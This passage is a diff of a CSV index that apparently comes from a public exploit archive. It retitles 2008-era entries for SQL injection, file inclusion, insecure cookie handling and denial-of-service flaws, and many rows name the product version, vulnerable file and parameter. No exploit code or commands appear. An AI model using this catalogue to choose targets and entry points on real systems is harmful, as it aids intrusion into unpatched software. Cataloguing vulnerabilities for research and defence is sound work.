Injection / Session Hijacking Exploit",2008-07-26,girex,php,webapps,0 6138,platforms/php/webapps/6138.txt,"Mobius 1.4.4.1 - (browse.php id) SQL Injection",2008-07-26,dun,php,webapps,0 6139,platforms/php/webapps/6139.txt,"EPShop < 3.0 - (pid) SQL Injection",2008-07-26,mikeX,php,webapps,0 -6140,platforms/php/webapps/6140.txt,"phpLinkat 0.1 Insecure Cookie Handling / SQL Injection",2008-07-26,"Encrypt3d.M!nd ",php,webapps,0 +6140,platforms/php/webapps/6140.txt,"phpLinkat 0.1 - Insecure Cookie Handling / SQL Injection",2008-07-26,"Encrypt3d.M!nd ",php,webapps,0 6141,platforms/php/webapps/6141.txt,"TriO 2.1 - (browse.php id) SQL Injection",2008-07-26,dun,php,webapps,0 6142,platforms/php/webapps/6142.txt,"CMScout 2.05 - (common.php bit) Local File Inclusion",2008-07-27,"Khashayar Fereidani",php,webapps,0 6143,platforms/php/webapps/6143.txt,"Getacoder clone - (sb_protype) SQL Injection",2008-07-27,"Hussin X",php,webapps,0 @@ -5776,7 +5776,7 @@ id,file,description,date,author,platform,type,port 6160,platforms/php/webapps/6160.txt,"PHP Hosting Directory 2.0 - (admin.php rd) Remote File Inclusion",2008-07-29,RoMaNcYxHaCkEr,php,webapps,0 6161,platforms/php/webapps/6161.txt,"HIOX Random Ad 1.3 - (hioxRandomAd.php hm) Remote File Inclusion",2008-07-30,"Ghost Hacker",php,webapps,0 6162,platforms/php/webapps/6162.txt,"hiox browser statistics 2.0 - Remote File Inclusion",2008-07-30,"Ghost Hacker",php,webapps,0 -6163,platforms/php/webapps/6163.txt,"PHP Hosting Directory 2.0 Insecure Cookie Handling",2008-07-30,Stack,php,webapps,0 +6163,platforms/php/webapps/6163.txt,"PHP Hosting Directory 2.0 - Insecure Cookie Handling",2008-07-30,Stack,php,webapps,0 6164,platforms/php/webapps/6164.txt,"nzFotolog 0.4.1 - (action_file) Local File Inclusion",2008-07-30,"Khashayar Fereidani",php,webapps,0 6165,platforms/php/webapps/6165.txt,"ZeeReviews - (comments.php ItemID) SQL Injection",2008-07-30,Mr.SQL,php,webapps,0 6166,platforms/php/webapps/6166.php,"HIOX Random Ad 1.3 - Arbitrary Add Admin User Exploit",2008-07-30,Stack,php,webapps,0 @@ -5816,13 +5816,13 @@ id,file,description,date,author,platform,type,port 6203,platforms/php/webapps/6203.txt,"Dayfox Blog 4 - Multiple Local File Inclusion",2008-08-04,"Virangar Security",php,webapps,0 6204,platforms/php/webapps/6204.txt,"Plogger 3.0 - SQL Injection",2008-08-05,"GulfTech Security",php,webapps,0 6205,platforms/php/webapps/6205.txt,"iges CMS 2.0 - (XSS/SQL) Multiple Vulnerabilities",2008-08-05,BugReport.IR,php,webapps,0 -6206,platforms/php/webapps/6206.txt,"LiteNews 0.1 Insecure Cookie Handling",2008-08-05,Scary-Boys,php,webapps,0 +6206,platforms/php/webapps/6206.txt,"LiteNews 0.1 - Insecure Cookie Handling",2008-08-05,Scary-Boys,php,webapps,0 6207,platforms/php/webapps/6207.txt,"LiteNews 0.1 - (id) SQL Injection",2008-08-05,Stack,php,webapps,0 6208,platforms/php/webapps/6208.txt,"Multiple Wsn Products - (LFI) Code Execution",2008-08-06,otmorozok428,php,webapps,0 6209,platforms/php/webapps/6209.rb,"LoveCMS 1.6.2 Final - Remote Code Execution Exploit",2008-08-06,PoMdaPiMp,php,webapps,0 6210,platforms/php/webapps/6210.rb,"LoveCMS 1.6.2 Final - Update Settings Remote Exploit",2008-08-06,PoMdaPiMp,php,webapps,0 6211,platforms/php/webapps/6211.txt,"quate CMS 0.3.4 - (LFI/XSS) Multiple Vulnerabilities",2008-08-06,CraCkEr,php,webapps,0 -6213,platforms/php/webapps/6213.txt,"Free Hosting Manager 1.2/2.0 Insecure Cookie Handling",2008-08-06,Scary-Boys,php,webapps,0 +6213,platforms/php/webapps/6213.txt,"Free Hosting Manager 1.2/2.0 - Insecure Cookie Handling",2008-08-06,Scary-Boys,php,webapps,0 6214,platforms/php/webapps/6214.php,"Discuz! 6.0.1 - (searchid) SQL Injection Exploit",2008-08-06,james,php,webapps,0 6215,platforms/php/webapps/6215.txt,"Ppim 1.0 - (Arbitrary File Delete/XSS) Multiple Vulnerabilities",2008-08-10,BeyazKurt,php,webapps,0 6216,platforms/windows/dos/6216.html,"Download Accelerator Plus - DAP 8.6 (AniGIF.ocx) Buffer Overflow PoC",2008-08-10,"Guido Landi",windows,dos,0 @@ -5833,7 +5833,7 @@ id,file,description,date,author,platform,type,port 6221,platforms/php/webapps/6221.txt,"Vacation Rental Script 3.0 - (id) SQL Injection",2008-08-10,CraCkEr,php,webapps,0 6223,platforms/php/webapps/6223.php,"Quicksilver Forums 1.4.1 - forums[] SQL Injection Exploit",2008-08-10,irk4z,php,webapps,0 6224,platforms/php/webapps/6224.txt,"txtSQL 2.2 Final - (startup.php) Remote File Inclusion",2008-08-10,CraCkEr,php,webapps,0 -6225,platforms/php/webapps/6225.txt,"PHP-Ring Webring System 0.9.1 Insecure Cookie Handling",2008-08-10,"Virangar Security",php,webapps,0 +6225,platforms/php/webapps/6225.txt,"PHP-Ring Webring System 0.9.1 - Insecure Cookie Handling",2008-08-10,"Virangar Security",php,webapps,0 6226,platforms/php/webapps/6226.txt,"psipuss 1.0 - Multiple SQL Injection",2008-08-10,"Virangar Security",php,webapps,0 6227,platforms/windows/remote/6227.c,"IntelliTamper 2.07 - HTTP Header Remote Code Execution Exploit",2008-08-10,"Wojciech Pawlikowski",windows,remote,0 6228,platforms/php/webapps/6228.txt,"OpenImpro 1.1 - (image.php id) SQL Injection",2008-08-10,nuclear,php,webapps,0 @@ -5985,7 +5985,7 @@ id,file,description,date,author,platform,type,port 6403,platforms/php/webapps/6403.txt,"Hot Links SQL-PHP 3 - (report.php) Multiple Vulnerabilities",2008-09-09,sl4xUz,php,webapps,0 6404,platforms/php/webapps/6404.txt,"Live TV Script - (index.php mid) SQL Injection",2008-09-09,InjEctOr5,php,webapps,0 6405,platforms/asp/webapps/6405.txt,"Creator CMS 5.0 - (sideid) SQL Injection",2008-09-09,"ThE X-HaCkEr",asp,webapps,0 -6406,platforms/php/webapps/6406.txt,"Stash 1.0.3 Insecure Cookie Handling",2008-09-09,Ciph3r,php,webapps,0 +6406,platforms/php/webapps/6406.txt,"Stash 1.0.3 - Insecure Cookie Handling",2008-09-09,Ciph3r,php,webapps,0 6407,platforms/windows/remote/6407.c,"Microworld Mailscan 5.6.a Password Reveal Exploit",2008-09-09,SlaYeR,windows,remote,0 6408,platforms/php/webapps/6408.txt,"CMS Buzz (id) SQL Injection",2008-09-09,"security fears team",php,webapps,0 6409,platforms/php/webapps/6409.txt,"Availscript Article Script - (articles.php) Multiple Vulnerabilities",2008-09-09,sl4xUz,php,webapps,0 @@ -6007,7 +6007,7 @@ id,file,description,date,author,platform,type,port 6427,platforms/php/webapps/6427.txt,"Sports Clubs Web Panel 0.0.1 - (p) Local File Inclusion",2008-09-11,StAkeR,php,webapps,0 6428,platforms/php/webapps/6428.pl,"Easy Photo Gallery 2.1 - XSS/FD/Bypass/SQL Injection Exploit",2008-09-11,"Khashayar Fereidani",php,webapps,0 6430,platforms/php/webapps/6430.txt,"D-iscussion Board 3.01 - (topic) Local File Inclusion",2008-09-11,SirGod,php,webapps,0 -6431,platforms/php/webapps/6431.pl,"phsBlog 0.2 Bypass SQL Injection Filtering Exploit",2008-09-11,"Khashayar Fereidani",php,webapps,0 +6431,platforms/php/webapps/6431.pl,"phsBlog 0.2 - Bypass SQL Injection Filtering Exploit",2008-09-11,"Khashayar Fereidani",php,webapps,0 6432,platforms/php/webapps/6432.py,"minb 0.1.0 - Remote Code Execution Exploit",2008-09-11,"Khashayar Fereidani",php,webapps,0 6433,platforms/php/webapps/6433.txt,"Autodealers CMS AutOnline (id) SQL Injection",2008-09-11,ZoRLu,php,webapps,0 6434,platforms/windows/dos/6434.html,"Maxthon Browser 2.1.4.443 UNICODE Remote Denial of Service PoC",2008-09-11,LiquidWorm,windows,dos,0 @@ -6032,7 +6032,7 @@ id,file,description,date,author,platform,type,port 6454,platforms/windows/remote/6454.html,"Windows Media Encoder XP SP2 - wmex.dll ActiveX BoF Exploit (MS08-053)",2008-09-13,haluznik,windows,remote,0 6455,platforms/php/webapps/6455.txt,"Linkarity - (link.php) SQL Injection",2008-09-13,"Egypt Coder",php,webapps,0 6456,platforms/php/webapps/6456.txt,"Free PHP VX Guestbook 1.06 - Arbitrary Database Backup",2008-09-13,SirGod,php,webapps,0 -6457,platforms/php/webapps/6457.txt,"Free PHP VX Guestbook 1.06 Insecure Cookie Handling",2008-09-14,Stack,php,webapps,0 +6457,platforms/php/webapps/6457.txt,"Free PHP VX Guestbook 1.06 - Insecure Cookie Handling",2008-09-14,Stack,php,webapps,0 6458,platforms/windows/dos/6458.c,"The Personal FTP Server 6.0f RETR Denial of Service",2008-09-14,Shinnok,windows,dos,0 6459,platforms/hardware/dos/6459.txt,"Nokia e90/n82 (s60v3) - Remote Denial of Service",2008-09-14,wins.mallow,hardware,dos,0 6460,platforms/php/webapps/6460.txt,"Kasseler CMS 1.1.0/1.2.0 Lite SQL Injection",2008-09-14,~!Dok_tOR!~,php,webapps,0 @@ -6073,7 +6073,7 @@ id,file,description,date,author,platform,type,port 6497,platforms/windows/dos/6497.c,"DESlock+ <= 3.2.7 - Local Kernel Race Condition Denial of Service PoC",2008-09-20,mu-b,windows,dos,0 6498,platforms/windows/dos/6498.c,"DESlock+ <= 3.2.7 - (probe read) Local Kernel Denial of Service PoC",2008-09-20,mu-b,windows,dos,0 6499,platforms/php/webapps/6499.txt,"Advanced Electron Forum 1.0.6 - Remote Code Execution",2008-09-20,"GulfTech Security",php,webapps,0 -6500,platforms/php/webapps/6500.txt,"Explay CMS 2.1 Insecure Cookie Handling",2008-09-20,Stack,php,webapps,0 +6500,platforms/php/webapps/6500.txt,"Explay CMS 2.1 - Insecure Cookie Handling",2008-09-20,Stack,php,webapps,0 6501,platforms/php/webapps/6501.txt,"MyFWB 1.0 - (index.php page) SQL Injection",2008-09-20,0x90,php,webapps,0 6502,platforms/php/webapps/6502.txt,"Diesel Pay Script (area) SQL Injection",2008-09-20,ZoRLu,php,webapps,0 6503,platforms/php/webapps/6503.txt,"Plaincart 1.1.2 - (p) SQL Injection",2008-09-20,r45c4l,php,webapps,0 @@ -6094,17 +6094,17 @@ id,file,description,date,author,platform,type,port 6518,platforms/php/webapps/6518.txt,"NetArtMedia Real Estate Portal 1.2 - SQL Injection",2008-09-21,"Encrypt3d.M!nd ",php,webapps,0 6519,platforms/php/webapps/6519.php,"PHP iCalendar 2.24 - (cookie_language) LFI / File Upload Exploit",2008-09-21,EgiX,php,webapps,0 6520,platforms/php/webapps/6520.txt,"6rbScript 3.3 - (section.php name) Local File Inclusion",2008-09-21,Stack,php,webapps,0 -6521,platforms/php/webapps/6521.txt,"Rianxosencabos CMS 0.9 Insecure Cookie Handling",2008-09-21,Stack,php,webapps,0 +6521,platforms/php/webapps/6521.txt,"Rianxosencabos CMS 0.9 - Insecure Cookie Handling",2008-09-21,Stack,php,webapps,0 6522,platforms/php/webapps/6522.txt,"Availscript Article Script - (view.php v) SQL Injection",2008-09-21,"Hussin X",php,webapps,0 6523,platforms/php/webapps/6523.php,"WCMS 1.0b Arbitrary Add Admin Exploit",2008-09-22,"CWH Underground",php,webapps,0 6524,platforms/php/webapps/6524.txt,"WSN Links 2.22/2.23 - (vote.php) SQL Injection",2008-09-22,d3v1l,php,webapps,0 6525,platforms/php/webapps/6525.txt,"WSN Links 2.20 - (comments.php) SQL Injection",2008-09-22,d3v1l,php,webapps,0 -6526,platforms/php/webapps/6526.txt,"PHP iCalendar 2.24 Insecure Cookie Handling",2008-09-22,Stack,php,webapps,0 +6526,platforms/php/webapps/6526.txt,"PHP iCalendar 2.24 - Insecure Cookie Handling",2008-09-22,Stack,php,webapps,0 6527,platforms/php/webapps/6527.txt,"BuzzyWall 1.3.1 - (search.php search) SQL Injection",2008-09-22,~!Dok_tOR!~,php,webapps,0 6528,platforms/php/webapps/6528.txt,"WCMS 1.0b - (news_detail.asp id) SQL Injection",2008-09-22,"CWH Underground",php,webapps,0 6529,platforms/php/webapps/6529.php,"WSN Links Free 4.0.34P - (comments.php) Blind SQL Injection Exploit",2008-09-22,Stack,php,webapps,0 6530,platforms/php/webapps/6530.txt,"OpenElec 3.01 - (form.php obj) Local File Inclusion",2008-09-22,dun,php,webapps,0 -6531,platforms/php/webapps/6531.txt,"MyBlog 0.9.8 Insecure Cookie Handling",2008-09-22,Pepelux,php,webapps,0 +6531,platforms/php/webapps/6531.txt,"MyBlog 0.9.8 - Insecure Cookie Handling",2008-09-22,Pepelux,php,webapps,0 6532,platforms/hardware/remote/6532.py,"Sagem Routers F@ST Remote CSRF Exploit (dhcp hostname attack)",2008-09-22,Zigma,hardware,remote,0 6533,platforms/php/webapps/6533.txt,"basebuilder 2.0.1 - (main.inc.php) Remote File Inclusion",2008-09-22,dun,php,webapps,0 6535,platforms/php/webapps/6535.txt,"Fez 1.3/2.0 RC1 - (list.php) SQL Injection",2008-09-22,d3v1l,php,webapps,0 @@ -6129,7 +6129,7 @@ id,file,description,date,author,platform,type,port 6554,platforms/windows/dos/6554.html,"Google Chrome Browser Carriage Return Null Object Memory Exhaustion",2008-09-24,"Aditya K Sood",windows,dos,0 6555,platforms/php/webapps/6555.txt,"Jadu CMS for Government - (recruit_details.php) SQL Injection",2008-09-24,r45c4l,php,webapps,0 6556,platforms/php/webapps/6556.txt,"webcp 0.5.7 - (filelocation) Remote File Disclosure",2008-09-24,GoLd_M,php,webapps,0 -6557,platforms/php/webapps/6557.txt,"ADN Forum 1.0b Insecure Cookie Handling",2008-09-24,Pepelux,php,webapps,0 +6557,platforms/php/webapps/6557.txt,"ADN Forum 1.0b - Insecure Cookie Handling",2008-09-24,Pepelux,php,webapps,0 6558,platforms/php/webapps/6558.txt,"barcodegen 2.0.0 - Local File Inclusion",2008-09-24,dun,php,webapps,0 6559,platforms/php/webapps/6559.txt,"Observer 0.3.2.1 - Multiple Remote Command Execution Vulnerabilities",2008-09-24,dun,php,webapps,0 6560,platforms/windows/dos/6560.txt,"Microsoft Windows Wordpad - .doc File Local Denial of Service PoC",2008-09-25,securfrog,windows,dos,0 @@ -6151,19 +6151,19 @@ id,file,description,date,author,platform,type,port 6576,platforms/php/webapps/6576.txt,"Ultimate Webboard 3.00 - (Category) SQL Injection",2008-09-26,"CWH Underground",php,webapps,0 6577,platforms/php/webapps/6577.txt,"PromoteWeb MySQL - (go.php id) SQL Injection",2008-09-26,"CWH Underground",php,webapps,0 6578,platforms/php/webapps/6578.txt,"212cafe Board 0.07 - (view.php qID) SQL Injection",2008-09-26,"CWH Underground",php,webapps,0 -6579,platforms/php/webapps/6579.txt,"Libra PHP File Manager 1.18 Insecure Cookie Handling",2008-09-26,Stack,php,webapps,0 -6580,platforms/php/webapps/6580.txt,"Atomic Photo Album 1.1.0pre4 Insecure Cookie Handling",2008-09-26,Stack,php,webapps,0 +6579,platforms/php/webapps/6579.txt,"Libra PHP File Manager 1.18 - Insecure Cookie Handling",2008-09-26,Stack,php,webapps,0 +6580,platforms/php/webapps/6580.txt,"Atomic Photo Album 1.1.0pre4 - Insecure Cookie Handling",2008-09-26,Stack,php,webapps,0 6581,platforms/windows/dos/6581.pl,"WinFTP Server 2.3.0 - (NLST) Denial of Service",2008-09-26,"Julien Bedard",windows,dos,0 6582,platforms/hardware/dos/6582.pl,"Windows Mobile 6.0 Device long name Remote Reboot Exploit",2008-09-26,"Julien Bedard",hardware,dos,0 6583,platforms/php/webapps/6583.txt,"Esqlanelapse Software Project 2.6.2 - Insecure Cookie Handling",2008-09-26,ZoRLu,php,webapps,0 -6584,platforms/php/webapps/6584.txt,"The Gemini Portal 4.7 Insecure Cookie Handling",2008-09-26,Pepelux,php,webapps,0 +6584,platforms/php/webapps/6584.txt,"The Gemini Portal 4.7 - Insecure Cookie Handling",2008-09-26,Pepelux,php,webapps,0 6585,platforms/php/webapps/6585.txt,"openengine 2.0 beta2 - Remote File Inclusion",2008-09-26,Crackers_Child,php,webapps,0 -6586,platforms/php/webapps/6586.txt,"Crux Gallery 1.32 Insecure Cookie Handling",2008-09-26,Pepelux,php,webapps,0 +6586,platforms/php/webapps/6586.txt,"Crux Gallery 1.32 - Insecure Cookie Handling",2008-09-26,Pepelux,php,webapps,0 6587,platforms/php/webapps/6587.txt,"The Gemini Portal (lang) Remote File Inclusion",2008-09-26,ZoRLu,php,webapps,0 6588,platforms/windows/dos/6588.txt,"Microsoft Windows GDI+ - (.ico) Remote Division By Zero Exploit",2008-09-26,"laurent gaffié ",windows,dos,0 6589,platforms/php/webapps/6589.txt,"RPG.Board 0.0.8Beta2 - (showtopic) SQL Injection",2008-09-26,0x90,php,webapps,0 6590,platforms/php/webapps/6590.txt,"ASPapp KnowledgeBase (catid) SQL Injection",2008-09-27,Crackers_Child,php,webapps,0 -6591,platforms/php/webapps/6591.txt,"RPG.Board 0.0.8Beta2 Insecure Cookie Handling",2008-09-27,Stack,php,webapps,0 +6591,platforms/php/webapps/6591.txt,"RPG.Board 0.0.8Beta2 - Insecure Cookie Handling",2008-09-27,Stack,php,webapps,0 6592,platforms/php/webapps/6592.txt,"X7 Chat 2.0.1A1 - (mini.php help_file) Local File Inclusion",2008-09-27,NoGe,php,webapps,0 6593,platforms/php/webapps/6593.txt,"Vbgooglemap Hotspot Edition 1.0.3 - SQL Injection",2008-09-27,elusiven,php,webapps,0 6594,platforms/php/webapps/6594.txt,"Camera Life 2.6.2b4 - Arbitrary File Upload",2008-09-27,Mi4night,php,webapps,0 @@ -6185,18 +6185,18 @@ id,file,description,date,author,platform,type,port 6611,platforms/php/webapps/6611.php,"PHPcounter 1.3.2 - (index.php name) SQL Injection Exploit",2008-09-28,StAkeR,php,webapps,0 6612,platforms/php/webapps/6612.txt,"Pro Chat Rooms 3.0.3 - (guid) SQL Injection",2008-09-28,~!Dok_tOR!~,php,webapps,0 6613,platforms/php/webapps/6613.txt,"Pilot Group eTraining - (news_read.php id) SQL Injection",2008-09-28,S.W.A.T.,php,webapps,0 -6614,platforms/windows/dos/6614.html,"Mozilla Firefox 3.0.3 User Interface Null Pointer Dereference Crash",2008-09-28,"Aditya K Sood",windows,dos,0 +6614,platforms/windows/dos/6614.html,"Mozilla Firefox 3.0.3 - User Interface Null Pointer Dereference Crash",2008-09-28,"Aditya K Sood",windows,dos,0 6615,platforms/windows/dos/6615.html,"Opera 9.52 Window Object Suppressing Remote Denial of Service",2008-09-28,"Aditya K Sood",windows,dos,0 6616,platforms/windows/dos/6616.txt,"Microsoft Windows Explorer - (.zip) Denial of Service",2008-09-28,"fl0 fl0w",windows,dos,0 6617,platforms/php/webapps/6617.txt,"BbZL.PhP 0.92 - (lien_2) Local Directory Traversal",2008-09-28,JIKO,php,webapps,0 6618,platforms/php/webapps/6618.txt,"joomla component imagebrowser 0.1.5 rc2 - Directory Traversal",2008-09-28,Cr@zy_King,php,webapps,0 6619,platforms/windows/dos/6619.html,"Microsoft Internet Explorer GDI+ - Proof of Concept (MS08-052)",2008-09-28,"John Smith",windows,dos,0 6620,platforms/php/webapps/6620.txt,"PHP-Fusion Mod freshlinks - (linkid) SQL Injection",2008-09-28,boom3rang,php,webapps,0 -6621,platforms/php/webapps/6621.txt,"BbZL.PhP 0.92 Insecure Cookie Handling",2008-09-28,Stack,php,webapps,0 +6621,platforms/php/webapps/6621.txt,"BbZL.PhP 0.92 - Insecure Cookie Handling",2008-09-28,Stack,php,webapps,0 6622,platforms/multiple/dos/6622.txt,"Wireshark 1.0.x - Malformed .ncf packet capture Local Denial of Service",2008-09-29,Shinnok,multiple,dos,0 6623,platforms/php/webapps/6623.txt,"events calendar 1.1 - Remote File Inclusion",2008-09-29,"k3vin mitnick",php,webapps,0 6624,platforms/php/webapps/6624.txt,"Arcadem Pro - (articlecat) SQL Injection",2008-09-29,"Hussin X",php,webapps,0 -6625,platforms/php/webapps/6625.txt,"Post Comments 3.0 Insecure Cookie Handling",2008-09-29,Crackers_Child,php,webapps,0 +6625,platforms/php/webapps/6625.txt,"Post Comments 3.0 - Insecure Cookie Handling",2008-09-29,Crackers_Child,php,webapps,0 6626,platforms/php/webapps/6626.txt,"PG Matchmaking Script Multiple SQL Injection",2008-09-29,"Super Cristal",php,webapps,0 6628,platforms/php/webapps/6628.txt,"ArabCMS - (rss.php rss) Local File Inclusion",2008-09-29,JIKO,php,webapps,0 6629,platforms/php/webapps/6629.txt,"FAQ Management Script - (catid) SQL Injection",2008-09-30,"Hussin X",php,webapps,0 @@ -6205,7 +6205,7 @@ id,file,description,date,author,platform,type,port 6632,platforms/php/webapps/6632.txt,"MiNBank 1.5.0 - Multiple Remote File Inclusion",2008-09-30,DaRkLiFe,php,webapps,0 6633,platforms/php/webapps/6633.txt,"eFront 3.5.1 / build 2710 - Remote Arbitrary Upload",2008-09-30,Pepelux,php,webapps,0 6634,platforms/php/webapps/6634.php,"SG Real Estate Portal 2.0 - Blind SQL Injection Exploit",2008-09-30,Stack,php,webapps,0 -6635,platforms/php/webapps/6635.txt,"SG Real Estate Portal 2.0 Insecure Cookie Handling",2008-09-30,Stack,php,webapps,0 +6635,platforms/php/webapps/6635.txt,"SG Real Estate Portal 2.0 - Insecure Cookie Handling",2008-09-30,Stack,php,webapps,0 6636,platforms/php/webapps/6636.txt,"Rianxosencabos CMS 0.9 - Remote Blind SQL Injection",2008-09-30,ka0x,php,webapps,0 6637,platforms/php/webapps/6637.txt,"BookMarks Favourites Script - (view_group.php id) SQL Injection",2008-09-30,"Hussin X",php,webapps,0 6638,platforms/windows/remote/6638.html,"GdPicture Pro ActiveX - (gdpicture4s.ocx) File Overwrite / Exec Exploit",2008-09-30,EgiX,windows,remote,0 @@ -6338,7 +6338,7 @@ id,file,description,date,author,platform,type,port 6768,platforms/php/webapps/6768.txt,"Mantis Bug Tracker 1.1.3 - Remote Code Execution Exploit",2008-10-16,EgiX,php,webapps,0 6769,platforms/php/webapps/6769.pl,"iGaming CMS 2.0 Alpha 1 - (search.php) SQL Injection Exploit",2008-10-16,StAkeR,php,webapps,0 6770,platforms/php/webapps/6770.txt,"PHP Easy Downloader 1.5 - (file) File Disclosure",2008-10-16,LMaster,php,webapps,0 -6771,platforms/cgi/webapps/6771.txt,"Calendars for the Web 4.02 Admin Auth Bypass",2008-10-16,SecVuln,cgi,webapps,0 +6771,platforms/cgi/webapps/6771.txt,"Calendars for the Web 4.02 - Admin Auth Bypass",2008-10-16,SecVuln,cgi,webapps,0 6772,platforms/php/webapps/6772.txt,"Post Affiliate Pro 2.0 - (index.php md) Local File Inclusion",2008-10-16,ZeN,php,webapps,0 6773,platforms/windows/remote/6773.html,"Hummingbird Deployment Wizard 2008 - ActiveX Command Execution",2008-10-17,shinnai,windows,remote,0 6774,platforms/windows/remote/6774.html,"Hummingbird Deployment Wizard 2008 Registry Values Creation/Change",2008-10-17,shinnai,windows,remote,0 @@ -6346,7 +6346,7 @@ id,file,description,date,author,platform,type,port 6776,platforms/windows/remote/6776.html,"Hummingbird Deployment Wizard 2008 - ActiveX File Execution(2)",2008-10-17,shinnai,windows,remote,0 6777,platforms/php/webapps/6777.txt,"WordPress Plugin st_newsletter - (stnl_iframe.php) SQL Injection",2008-10-17,r45c4l,php,webapps,0 6778,platforms/php/webapps/6778.pl,"XOOPS Module GesGaleri (kategorino) SQL Injection Exploit",2008-10-18,EcHoLL,php,webapps,0 -6779,platforms/php/webapps/6779.txt,"phpFastNews 1.0.0 Insecure Cookie Handling",2008-10-18,Qabandi,php,webapps,0 +6779,platforms/php/webapps/6779.txt,"phpFastNews 1.0.0 - Insecure Cookie Handling",2008-10-18,Qabandi,php,webapps,0 6780,platforms/php/webapps/6780.txt,"zeeproperty (adid) SQL Injection",2008-10-18,"Hussin X",php,webapps,0 6781,platforms/php/webapps/6781.pl,"Meeting Room Booking System (MRBS) < 1.4 - SQL Injection Exploit",2008-10-18,Xianur0,php,webapps,0 6782,platforms/php/webapps/6782.php,"miniBloggie 1.0 - (del.php) Remote Blind SQL Injection Exploit",2008-10-18,StAkeR,php,webapps,0 @@ -6401,7 +6401,7 @@ id,file,description,date,author,platform,type,port 6833,platforms/php/webapps/6833.txt,"phpdaily - (SQL/XSS/lfd) Multiple Vulnerabilities",2008-10-24,0xFFFFFF,php,webapps,0 6834,platforms/windows/dos/6834.c,"vicFTP 5.0 - (LIST) Remote Denial of Service",2008-10-24,"Alfons Luja",windows,dos,0 6835,platforms/php/webapps/6835.txt,"BuzzyWall 1.3.1 - (download id) Remote File Disclosure",2008-10-24,b3hz4d,php,webapps,0 -6836,platforms/php/webapps/6836.txt,"Tlnews 2.2 Insecure Cookie Handling",2008-10-25,x0r,php,webapps,0 +6836,platforms/php/webapps/6836.txt,"Tlnews 2.2 - Insecure Cookie Handling",2008-10-25,x0r,php,webapps,0 6837,platforms/php/webapps/6837.txt,"Kasra CMS - (index.php) Multiple SQL Injection",2008-10-25,G4N0K,php,webapps,0 6838,platforms/windows/dos/6838.rb,"PumpKIN TFTP Server 2.7.2.0 - Denial of Service (Metasploit)",2008-10-25,"Saint Patrick",windows,dos,0 6839,platforms/php/webapps/6839.txt,"PozScripts Classified Auctions - (gotourl.php id) SQL Injection",2008-10-26,"Hussin X",php,webapps,0 @@ -6422,12 +6422,12 @@ id,file,description,date,author,platform,type,port 6854,platforms/php/webapps/6854.txt,"Aiocp 1.4 - (poll_id) SQL Injection",2008-10-27,ExSploiters,php,webapps,0 6855,platforms/php/webapps/6855.txt,"MyKtools 2.4 - Arbitrary Database Backup",2008-10-27,Stack,php,webapps,0 6856,platforms/php/webapps/6856.txt,"e107 Plugin BLOG Engine 2.1.4 - SQL Injection",2008-10-28,ZoRLu,php,webapps,0 -6857,platforms/php/webapps/6857.txt,"MyForum 1.3 Insecure Cookie Handling",2008-10-28,Stack,php,webapps,0 +6857,platforms/php/webapps/6857.txt,"MyForum 1.3 - Insecure Cookie Handling",2008-10-28,Stack,php,webapps,0 6858,platforms/php/webapps/6858.txt,"PersianBB - (iranian_music.php id) SQL Injection",2008-10-28,"Hussin X",php,webapps,0 6859,platforms/php/webapps/6859.txt,"Agares ThemeSiteScript 1.0 (loadadminpage) - Remote File Inclusion",2008-10-28,DaRkLiFe,php,webapps,0 -6860,platforms/php/webapps/6860.txt,"TlGuestBook 1.2 Insecure Cookie Handling",2008-10-28,x0r,php,webapps,0 +6860,platforms/php/webapps/6860.txt,"TlGuestBook 1.2 - Insecure Cookie Handling",2008-10-28,x0r,php,webapps,0 6861,platforms/php/webapps/6861.pl,"H2O-CMS 3.4 - Remote Command Execution Exploit (mq = off)",2008-10-28,StAkeR,php,webapps,0 -6862,platforms/php/webapps/6862.txt,"H2O-CMS 3.4 Insecure Cookie Handling",2008-10-29,Stack,php,webapps,0 +6862,platforms/php/webapps/6862.txt,"H2O-CMS 3.4 - Insecure Cookie Handling",2008-10-29,Stack,php,webapps,0 6863,platforms/windows/dos/6863.pl,"PacketTrap TFTPD 2.2.5459.0 - Remote Denial of Service",2008-10-29,"Jeremy Brown",windows,dos,0 6864,platforms/cgi/webapps/6864.txt,"Sepal SPBOARD 4.5 - (board.cgi) Remote Command Exec",2008-10-29,GoLd_M,cgi,webapps,0 6865,platforms/php/webapps/6865.txt,"e107 plugin fm pro 1 - (fd/upload/dt) Multiple Vulnerabilities",2008-10-29,GoLd_M,php,webapps,0 @@ -6448,32 +6448,32 @@ id,file,description,date,author,platform,type,port 6880,platforms/windows/remote/6880.html,"Opera 9.61 opera:historysearch Code Execution Exploit PoC",2008-10-30,"Aviv Raff",windows,remote,0 6881,platforms/php/webapps/6881.txt,"Absolute File Send 1.0 - Remote Cookie Handling",2008-10-30,Hakxer,php,webapps,0 6882,platforms/php/webapps/6882.txt,"Absolute Podcast 1.0 - Remote Insecure Cookie Handling",2008-10-30,Hakxer,php,webapps,0 -6883,platforms/php/webapps/6883.txt,"Absolute Poll Manager XE 4.1 Cookie Handling",2008-10-30,Hakxer,php,webapps,0 +6883,platforms/php/webapps/6883.txt,"Absolute Poll Manager XE 4.1 - Cookie Handling",2008-10-30,Hakxer,php,webapps,0 6885,platforms/php/webapps/6885.txt,"e107 Plugin lyrics_menu - (lyrics_song.php l_id) SQL Injection",2008-10-31,ZoRLu,php,webapps,0 6886,platforms/php/webapps/6886.txt,"Tribiq CMS 5.0.9a (beta) Insecure Cookie Handling",2008-10-31,ZoRLu,php,webapps,0 6887,platforms/php/webapps/6887.txt,"Cybershade CMS 0.2b - Remote File Inclusion",2008-10-31,w0cker,php,webapps,0 6888,platforms/php/webapps/6888.txt,"Tribiq CMS 5.0.10a - Local File Inclusion (Windows)",2008-10-31,GoLd_M,php,webapps,0 -6889,platforms/php/webapps/6889.txt,"Absolute Content Rotator 6.0 Insecure Cookie Handling",2008-10-31,Hakxer,php,webapps,0 -6890,platforms/php/webapps/6890.txt,"Absolute Banner Manager Insecure Cookie Handling",2008-10-31,Hakxer,php,webapps,0 -6891,platforms/php/webapps/6891.txt,"Absolute Form Processor 4.0 Insecure Cookie Handling",2008-10-31,Hakxer,php,webapps,0 -6892,platforms/php/webapps/6892.txt,"Absolute Live Support 5.1 Insecure Cookie Handling",2008-10-31,Hakxer,php,webapps,0 -6893,platforms/php/webapps/6893.txt,"Absolute Control Panel XE 1.5 Insecure Cookie Handling",2008-10-31,Hakxer,php,webapps,0 +6889,platforms/php/webapps/6889.txt,"Absolute Content Rotator 6.0 - Insecure Cookie Handling",2008-10-31,Hakxer,php,webapps,0 +6890,platforms/php/webapps/6890.txt,"Absolute Banner Manager - Insecure Cookie 